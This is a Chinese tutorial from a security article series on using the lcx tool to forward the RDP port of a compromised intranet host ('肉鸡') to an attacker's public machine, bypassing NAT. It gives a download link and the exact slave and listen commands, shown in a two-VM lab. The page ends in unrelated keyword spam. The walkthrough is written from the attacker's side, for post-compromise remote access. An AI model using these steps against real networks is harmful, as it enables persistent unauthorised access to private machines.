千家信息网

网络安全系列之二 lcx端口转发实现内网突破

发表于:2024-11-22 作者:千家信息网编辑
千家信息网最后更新 2024年11月22日,内网中的主机一般都是使用私有IP,在网络出口处经过NAT转换为公网IP之后,才能访问Internet。在这种网络结构下,通信双方之间实现的是单向访问,即只有内网中的主机可以主动访问Internet中的
千家信息网最后更新 2024年11月22日网络安全系列之二 lcx端口转发实现内网突破

内网中的主机一般都是使用私有IP,在网络出口处经过NAT转换为公网IP之后,才能访问Internet。在这种网络结构下,通信双方之间实现的是单向访问,即只有内网中的主机可以主动访问Internet中的主机,反之则不行。如果在内网中架设了一台服务器,又需要允许Internet中的用户访问这台服务器,那么就必须在网络出口处进行端口映射。
在网络***中,如果捕获了一台位于内网中的肉鸡,那么***是无法主动去连接这台肉鸡的,而且也不可能在人家的网络出口做端口映射,这时就可以用到lcx这个小工具了。下载地址:http://down.51cto.com/data/1878979

Lcx可以实现端口转发,将肉鸡A上的某个端口(如3389)转发到具有公网地址的主机B上,这样***只需连接主机B的3389端口就相当于连接到了肉鸡A上,从而突破了内网私有IP的限制。
下面在vmware中利用2台虚拟机来模拟操作,一台虚拟机作为***主机(IP地址192.168.80.128),另一台虚拟机作为肉鸡(IP地址192.168.80.129)。
首先将lcx分别放到这两台虚拟机的C盘根目录下,首先在肉鸡上执行命令"lcx -slave 192.168.80.128 5000 192.168.80.129 3389",也就是将192.168.80.129上的3389端口转发到192.168.80.128上的5000端口。
然后再到***主机上执行命令"lcx -listen 5000 3389",也就是在5000端口上监听,并将收到的数据转发到自己的3389端口上。此时在***主机上执行"netstat -an"命令,可以看到同时开放了5000和3389两个端口。
最后在***主机上打开mstsc,只需输入自己的IP地址(192.168.80.128或是127.0.0.1)便可以连接到肉鸡上了,从而实现内网突破。

端口 主机 肉鸡 网络 地址 命令 出口 突破 主动 也就是 出口处 只需 服务器 公网 服务 私有 不行 网络结构 两个 之间 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 百度服务器硬盘 恩施配方管理软件开发 网络安全的厂商有哪些 数据库实验教程第三版清华大学 微信使用多少台服务器 黄浦区软件开发要多少钱 网络安全设备初始密码是多少 分析计算机网络安全技术 电话工作中计算机网络技术 oda如何安装新版本数据库 安阳腾飞网络技术有限公司 网络安全 数据合规 尽调 基础软件开发上市公司 禅道如何用数据库连接 支付宝点餐服务器 数据库 权限设计 南昌服务器回收企业 学网络安全要云服务器么 致软件开发公司的感谢信 ncbi中标准数据库和ITS库 怀旧服大脚插件服务器不兼容 数据库asp技术 网络安全阀所称网络 中国网络安全问题的形式 星际公民怎么进人少的服务器 消防支队网络安全自查表 王宁 浅谈当今移动网络安全 服务器级别笔记本多少钱 软件开发工程师的生涯感悟 阿里云轻量服务器进入镜像
0